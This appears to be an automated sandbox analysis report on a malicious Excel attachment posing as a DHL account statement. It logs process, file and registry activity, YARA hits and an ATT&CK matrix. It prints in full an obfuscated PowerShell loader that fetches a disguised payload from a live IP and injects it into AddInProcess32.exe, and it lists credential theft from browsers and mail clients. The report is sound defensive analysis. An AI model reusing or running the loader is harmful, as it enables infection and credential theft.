                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "invoke-expression ( ('oil'+'li'+'n'+'k = olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgols; oilwebclient = new-object'+' system.net.webclient; try { oildownloadeddata = oi'+'lwebclient.downloaddata(oillink) } catch { write-host olsfailed to download data from oillinkols -foregroundcolor red; exit }; if (oildownloadeddata -ne oilnull) { oilimagetext = [sy'+'stem.t'+'ex'+'t.encoding]::utf8.getstring'+'(oildownloadeddata); oilstartflag = ols<<base64_start>>ols; oilendflag = ols<<base64_end>>ols; oilstartindex = oilimagetext.indexof(oilstartflag); oilendindex = oilimagetext.indexof(oilendflag); if (oilstartindex -ge 0 -and oilendin'+'dex -gt oilstartindex) { oilstartind'+'ex += oilstartflag.length; oilbase64length = oilendin'+'dex - oilstartind'+'ex; oilbase64command = oilimagetext.substri'+'ng(oilstartindex, oilbase64lengt'+'h); oilcommandbytes = [system.convert]::frombase64string(oilbase64command); oil'+'loadedassembly = [system.reflection.assembly]::load(oilcomm'+'andbytes); oiltype = oilloadedassembly.gettype(olsrunpe.homeols); oilmethod = oiltype.getmethod(olsvaiols).invoke(oilnull,'+' [object[]] (olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthols , olsdesativad'+'ools , olsdesativadools , olsdesativadools,olsaddinprocess32ols,olsols)) } }set scriptblock oillink = olshttp://91.92.254.194/imge/new-image_v.jpgols; oilwebclient ='+' new-object system.net.webclient; try { oi'+'ldownloadeddata = oilwebclient.downloaddata(oillink) } catch { write-host olsfailed to down'+'load data from oillinkols -foregroundcolor red; exit }; if (oildownloadeddata -ne oi'+'lnull) { oilimagetext = [system.t'+'ext.encoding]::utf8.getstring('+'oildownloadeddata); oilstartflag = ols<<base64_start>>ols; oilendflag = ols<<base64_end>>ols; oilstartindex = oilimagetext.indexof(oilstartflag); oilen'+'dindex = oilimagetext.indexof(oilendflag); if (oilstartindex -ge 0 -and oilendinde'+'x -gt oilstartindex) { oilstartindex += '+'oilstartflag.length; oilbase64length = oilendindex - oilstartindex; oilbase64command ='+' oilimagetext.substring(oilstartindex'+', oilbase64length); oi'+'lcommandbytes = [system.convert]::frombase64string(oilbase64command); oilloadedassembly = [system.reflection.'+'assembly]::load(oilcommandbytes); oiltype = '+'oilloadedassembly.gettype(ols'+'runpe.homeol'+'s); oilmethod = oiltype.getmethod(ols'+'vaiol'+'s).invoke(oilnull, [object[]] (olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthols , olsdesativ'+'adools , olsdesativadools , olsdesati'+'vadools,olsaddinprocess32ols,olsols)) } }set scr'+'iptblock oillink '+'= olshttp://91.92.2'+'54.194/imge/new-image_v.jpgols; oilwebclient = new-'+'object system.net.webclient; try { oildownloadeddata '+'= oilw'+'ebclient.downloaddata(oillink) } catch { write-host olsfailed to download data '+'from oillinkols -foregroundcolor red; exit }; if (oildownloadeddata'+' -ne oilnu'+'ll)
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "invoke-expression ( ('oil'+'li'+'n'+'k = olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgols; oilwebclient = new-object'+' system.net.webclient; try { oildownloadeddata = oi'+'lwebclient.downloaddata(oillink) } catch { write-host olsfailed to download data from oillinkols -foregroundcolor red; exit }; if (oildownloadeddata -ne oilnull) { oilimagetext = [sy'+'stem.t'+'ex'+'t.encoding]::utf8.getstring'+'(oildownloadeddata); oilstartflag = ols<<base64_start>>ols; oilendflag = ols<<base64_end>>ols; oilstartindex = oilimagetext.indexof(oilstartflag); oilendindex = oilimagetext.indexof(oilendflag); if (oilstartindex -ge 0 -and oilendin'+'dex -gt oilstartindex) { oilstartind'+'ex += oilstartflag.length; oilbase64length = oilendin'+'dex - oilstartind'+'ex; oilbase64command = oilimagetext.substri'+'ng(oilstartindex, oilbase64lengt'+'h); oilcommandbytes = [system.convert]::frombase64string(oilbase64command); oil'+'loadedassembly = [system.reflection.assembly]::load(oilcomm'+'andbytes); oiltype = oilloadedassembly.gettype(olsrunpe.homeols); oilmethod = oiltype.getmethod(olsvaiols).invoke(oilnull,'+' [object[]] (olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthols , olsdesativad'+'ools , olsdesativadools , olsdesativadools,olsaddinprocess32ols,olsols)) } }set scriptblock oillink = olshttp://91.92.254.194/imge/new-image_v.jpgols; oilwebclient ='+' new-object system.net.webclient; try { oi'+'ldownloadeddata = oilwebclient.downloaddata(oillink) } catch { write-host olsfailed to down'+'load data from oillinkols -foregroundcolor red; exit }; if (oildownloadeddata -ne oi'+'lnull) { oilimagetext = [system.t'+'ext.encoding]::utf8.getstring('+'oildownloadeddata); oilstartflag = ols<<base64_start>>ols; oilendflag = ols<<base64_end>>ols; oilstartindex = oilimagetext.indexof(oilstartflag); oilen'+'dindex = oilimagetext.indexof(oilendflag); if (oilstartindex -ge 0 -and oilendinde'+'x -gt oilstartindex) { oilstartindex += '+'oilstartflag.length; oilbase64length = oilendindex - oilstartindex; oilbase64command ='+' oilimagetext.substring(oilstartindex'+', oilbase64length); oi'+'lcommandbytes = [system.convert]::frombase64string(oilbase64command); oilloadedassembly = [system.reflection.'+'assembly]::load(oilcommandbytes); oiltype = '+'oilloadedassembly.gettype(ols'+'runpe.homeol'+'s); oilmethod = oiltype.getmethod(ols'+'vaiol'+'s).invoke(oilnull, [object[]] (olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthols , olsdesativ'+'adools , olsdesativadools , olsdesati'+'vadools,olsaddinprocess32ols,olsols)) } }set scr'+'iptblock oillink '+'= olshttp://91.92.2'+'54.194/imge/new-image_v.jpgols; oilwebclient = new-'+'object system.net.webclient; try { oildownloadeddata '+'= oilw'+'ebclient.downloaddata(oillink) } catch { write-host olsfailed to download data '+'from oillinkols -foregroundcolor red; exit }; if (oildownloadeddata'+' -ne oilnu'+'ll) Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.41bb700.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.41bb700.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.479098901.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.616770593.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.518863919.0000000003D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.518863919.000000000411B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1904, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1444, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3436, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.41bb700.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.41bb700.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.479098901.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.616770593.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.485482053.00000000022B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.617260829.0000000002255000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.492812954.0000000002415000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.504664614.00000000022E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.479192755.0000000002425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.518863919.0000000003D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.518863919.000000000411B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1904, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1444, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3108, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3200, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3276, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3352, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3436, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.41bb700.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.41bb700.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.479098901.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.616770593.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.518863919.0000000003D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.518863919.000000000411B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1904, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1444, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3436, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information211
                  Scripting
                  Valid Accounts231
                  Windows Management Instrumentation
                  211
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  File and Directory Discovery
                  Remote Services11
                  Archive Collected Data
                  24
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Native API
                  1
                  DLL Side-Loading
                  311
                  Process Injection
                  11
                  Deobfuscate/Decode Files or Information
                  1
                  Input Capture
                  34
                  System Information Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  1
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts43
                  Exploitation for Client Execution
                  Logon Script (Windows)Logon Script (Windows)1
                  Obfuscated Files or Information
                  Security Account Manager531
                  Security Software Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  3
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts211
                  Command and Scripting Interpreter
                  Login HookLogin Hook1
                  Software Packing
                  NTDS1
                  Process Discovery
                  Distributed Component Object Model1
                  Input Capture
                  13
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  PowerShell
                  Network Logon ScriptNetwork Logon Script1
                  DLL Side-Loading
                  LSA Secrets261
                  Virtualization/Sandbox Evasion
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading
                  Cached Domain Credentials1
                  Application Window Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
                  Virtualization/Sandbox Evasion
                  DCSync1
                  Remote System Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                  Process Injection
                  Proc Filesystem1
                  System Network Configuration Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1467966 Sample: DHL ESTADO DE CUENTA - 7664... Startdate: 05/07/2024 Architecture: WINDOWS Score: 100 61 Snort IDS alert for network traffic 2->61 63 Multi AV Scanner detection for domain / URL 2->63 65 Found malware configuration 2->65 67 27 other signatures 2->67 9 EXCEL.EXE 6 9 2->9         started        process3 file4 37 ~$DHL ESTADO DE CU...557687757.xlam.xlsx, data 9->37 dropped 12 EQNEDT32.EXE 12 9->12         started        17 AddInProcess32.exe 12 2 9->17         started        process5 dnsIp6 57 198.46.178.144, 49161, 49164, 49166 AS-COLOCROSSINGUS United States 12->57 39 C:\...\controlfiredatinloverforxlammfile.vbs, Unicode 12->39 dropped 41 controlfiredatinloverforxlammfile[1].vbs, Unicode 12->41 dropped 87 Office equation editor establishes network connection 12->87 89 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->89 19 wscript.exe 1 12->19         started        59 ip-api.com 